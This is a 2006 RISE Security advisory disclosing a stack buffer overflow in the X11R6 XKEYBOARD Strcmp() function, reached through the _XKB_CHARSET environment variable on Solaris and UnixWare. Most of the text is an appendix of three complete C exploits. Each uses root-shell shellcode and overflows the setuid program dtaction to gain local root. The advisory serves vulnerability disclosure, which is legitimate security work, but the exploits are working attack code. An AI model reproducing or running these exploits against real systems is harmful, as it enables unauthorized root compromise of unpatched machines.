<<< Date Index >>>     <<< Thread Index >>>

[RISE-2006001] X11R6 XKEYBOARD extension Strcmp() buffer overflow



RISE-2006001
X11R6 XKEYBOARD extension Strcmp() buffer overflow vulnerability

Released: September 07, 2006
Last updated: September 07, 2006

INTRODUCTION

There exists a vulnerability within a string manipulation function of the X11R6
(X11R6.4 and lower) X Window System library, which when properly exploited can
lead to local compromise of the vulnerable system.
This vulnerability was silently fixed in X11R6.5.1 release, but it is still
present in multiple vendors operating systems source tree.
This vulnerability was confirmed by us in the following versions and operating
systems, other versions and operating systems may be also affected.

Sun Solaris 10 SPARC/x86
Sun Solaris 9 SPARC/x86
Sun Solaris 8 SPARC/x86
SCO UnixWare 7.1.3

DETAILS

This vulnerability can be triggered by invoking a dynamicaly linked binary, with
_XKB_CHARSET environment variable set to a long string value, and DISPLAY
environment variable set to a X Window System server with the XKEYBOARD
extension enabled.
This is the vulnerable function (from X11R6.4).

static int
#if NeedFunctionPrototypes
Strcmp(char *str1, char *str2)
#else
Strcmp(str1, str2)
    char *str1, *str2;
#endif
{
    char str[256];
    char c, *s;

    for (s = str; c = *str1++; ) {
        if (isupper(c))
            c = tolower(c);
        *s++ = c;
    }
    *s = '\0';
    return (strcmp(str, str2));
}

The proof of concept codes we have written for this vulnerability can be found
in appendix section of this document.
All source codes from this document can be also downloaded from our website.
http://www.risesecurity.org/

VENDOR

Sun has released patches for this vulnerability, the Sun Alert ID is 102570
and it is available at the following URL:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1
SCO did not answer to our email.

CREDITS

This vulnerability was discovered by Adriano Lima <adriano@xxxxxxxxxxxxxxxx> and
Filipe Balestra <filipe_balestra@xxxxxxxxxxx>.

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any information
provided, including any kind of information which is incomplete or incorrect,
will therefore be rejected.

APPENDIX

sol-sparc-xkb.c

/*
 *  X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC
 *  Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>,
 *  Ramon de Carvalho Valle <ramon@xxxxxxxxxxxxxxxx>
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  
USA
 *
 */

/*
 *  Compile with the following command.
 *  $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c
 *
 *  Set the DISPLAY environment variable to a X Window System server with
 *  XKEYBOARD extension enabled.
 *  $ ./sol-sparc-xkb sprintf|strcpy xserver:display
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dlfcn.h>
#include <link.h>
#include <sys/systeminfo.h>
#include <procfs.h>

#define BUFSIZE 13+256+64+2+1
#define FRMSIZE 64+3+1
#define ADRSIZE 2047+1
#define SHLSIZE strlen(shellcode)+1
#define DSPSIZE strlen(display)+1
#define ARGSIZE 7+1
#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE
#define PFMSIZE strlen(platform)+1
#define PRGSIZE 20+1

#define PAD(a,b,c) \
    a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4);

char shellcode[]=           /*  60 bytes                          */
    "\x90\x1a\x40\x09"      /*  xor     %o1,%o1,%o0               */
    "\x82\x10\x20\x17"      /*  mov     0x17,%g1                  */
    "\x91\xd0\x20\x08"      /*  ta      0x08                      */
    "\x21\x0b\xd8\x9a"      /*  sethi   %hi(0x2f62696e),%l0       */
    "\xa0\x14\x29\x6e"      /*  or      %l0,0x96e,%l0             */
    "\x23\x0b\xdc\xda"      /*  sethi   %hi(0x2f736800),%l1       */
    "\x90\x23\xa0\x08"      /*  sub     %sp,0x08,%o0              */
    "\x92\x23\xa0\x10"      /*  sub     %sp,0x10,%o1              */
    "\x94\x1a\x80\x0a"      /*  xor     %o2,%o2,%o2               */
    "\xe0\x23\xbf\xf8"      /*  st      %l0,[%sp-0x08]            */
    "\xe2\x23\xbf\xfc"      /*  st      %l1,[%sp-0x04]            */
    "\xd0\x23\xbf\xf0"      /*  st      %o0,[%sp-0x10]            */
    "\xc0\x23\xbf\xf4"      /*  st      %g0,[%sp-0x0c]            */
    "\x82\x10\x20\x3b"      /*  mov     0x3b,%g1                  */
    "\x91\xd0\x20\x08"      /*  ta      0x08                      */
;

void *find_symbol(const char *symbol){
    void *handle,*addr;
    char *err;

    if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){
        fprintf(stderr,"%s\n",dlerror());
        exit(EXIT_FAILURE);
    }

    dlerror();
    addr=dlsym(handle,symbol);
    if((err=dlerror())!=NULL){
        fprintf(stderr,"%s\n",err);
        exit(EXIT_FAILURE);
    }

    dlclose(handle);

    return addr;
}

void *find_rwxmem(void){
    FILE *fp;
    prmap_t map;
    int flags;
    void *addr;

    if((fp=fopen("/proc/self/map","rb"))==NULL){
        perror("fopen");
        exit(EXIT_FAILURE);
    }

    while(fread(&map,sizeof(map),1,fp)){
        flags=map.pr_mflags;

        if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){
            if(flags&MA_STACK) continue;
            addr=(void *)map.pr_vaddr;
        }
    }

    fclose(fp);

    return addr;
}

int main(int argc,char **argv){
    char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p;
    int base,offset,i,flag=0;

    printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n");
    printf("Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>\n\n");

    if(argc!=3){
        fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);
        exit(EXIT_FAILURE);
    }

    if(!strcmp(argv[1],"sprintf")) flag=1;
    if(!strcmp(argv[1],"strcpy")) flag=2;

    if(!flag){
        fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);
        exit(EXIT_FAILURE);
    }

    snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]);

    if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){
        perror("sysinfo");
        exit(EXIT_FAILURE);
    }

    base=((int)argv[0]|0xffff);
    base++;

    offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE;
    PAD(offset,1,sizeof(envp)-1);

    *((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE;
    *((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE;
    *((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE;

    switch(flag){
    case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break;
    case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4;
    }

    *((int *)addr[4])=(int)find_rwxmem()+4;
    *((int *)addr[5])=*((int *)addr[4])-8;

    p=buf;
    sprintf(p,"_XKB_CHARSET=");
    p=buf+13;
    for(i=0;i<256;i++) *p++='A';
    for(i=0;i<66;i++) *p++=addr[1][i%4];
    *p='\0';

    memcpy(buf+13+256+56,addr[0],4);
    memcpy(buf+13+256+60,addr[3],4);

    p=buf+1024;;
    for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4];
    *p='\0';

    memcpy(buf+1024+32,addr[4],4);
    memcpy(buf+1024+36,addr[2],4);
    memcpy(buf+1024+60,addr[5],4);

    p=buf+2048;
    for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4];
    *p='\0';

    envp[0]=&buf[0];
    envp[1]=&buf[1024];
    envp[2]=&buf[2048];
    envp[3]=shellcode;
    envp[4]=display;
    envp[5]=NULL;

    execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp);

    exit(EXIT_FAILURE);
}

sol-x86-xkb.c

/*
 *  X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86
 *  Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>,
 *  Ramon de Carvalho Valle <ramon@xxxxxxxxxxxxxxxx>
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  
USA
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ADRSIZE 1024
#define NOPSIZE 4096

char shellcode[]=           /*  47 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\xb0\x17"              /*  movb    $0x17,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68\x2f\x6b\x73\x68"  /*  pushl   $0x68736b2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\x89\xe1"              /*  movl    %esp,%ecx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x51"                  /*  pushl   %ecx                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
;

int main(int argc,char **argv){
    char buf[8192],display[256],addr[4],*envp[4],*p;
    int i;

    printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n");
    printf("Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>\n\n");

    if(argc!=2){
        fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
        exit(EXIT_FAILURE);
    }

    snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);

    *((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1;

    p=buf;
    sprintf(p,"_XKB_CHARSET=");
    p=buf+13;
    for(i=0;i<256;i++) *p++='A';
    for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
    for(i=0;i<NOPSIZE;i++) *p++='\x90';
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p='\0';

    envp[0]=buf;
    envp[1]=display;
    envp[2]=NULL;

    execle("/usr/dt/bin/dtaction","dtaction",0,envp);

    exit(EXIT_FAILURE);
}

sco-x86-xkb.c

/*
 *  X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86
 *  Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>,
 *  Ramon de Carvalho Valle <ramon@xxxxxxxxxxxxxxxx>
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  
USA
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ADRSIZE 1024
#define NOPSIZE 4096

char shellcode[]=           /*  43 bytes                          */
    "\x68\xff\xf8\xff\x3c"  /*  pushl   $0x3cfff8ff               */
    "\x6a\x65"              /*  pushl   $0x65                     */
    "\x89\xe6"              /*  movl    %esp,%esi                 */
    "\xf7\x56\x04"          /*  notl    0x04(%esi)                */
    "\xf6\x16"              /*  notb    (%esi)                    */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\xb0\x17"              /*  movb    $0x17,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
    "\x31\xc0"              /*  xorl    %eax,%eax                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x68\x2f\x2f\x73\x68"  /*  pushl   $0x68732f2f               */
    "\x68\x2f\x62\x69\x6e"  /*  pushl   $0x6e69622f               */
    "\x89\xe3"              /*  movl    %esp,%ebx                 */
    "\x50"                  /*  pushl   %eax                      */
    "\x50"                  /*  pushl   %eax                      */
    "\x53"                  /*  pushl   %ebx                      */
    "\xb0\x3b"              /*  movb    $0x3b,%al                 */
    "\xff\xd6"              /*  call    *%esi                     */
;

int main(int argc,char **argv){
    char buf[8192],display[256],addr[4],*envp[4],*p;
    int i;

    printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n");
    printf("Copyright 2006 RISE Security <contact@xxxxxxxxxxxxxxxx>\n\n");

    if(argc!=2){
        fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
        exit(EXIT_FAILURE);
    }

    snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);

    *((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1;

    p=buf;
    sprintf(p,"_XKB_CHARSET=");
    p=buf+13;
    for(i=0;i<256;i++) *p++='A';
    for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
    for(i=0;i<NOPSIZE;i++) *p++='\x90';
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p='\0';

    envp[0]=buf;
    envp[1]=display;
    envp[2]=NULL;

    execle("/usr/dt/bin/dtaction","dtaction",0,envp);

    exit(EXIT_FAILURE);
}

Best regards,
RISE Security
http://www.risesecurity.org/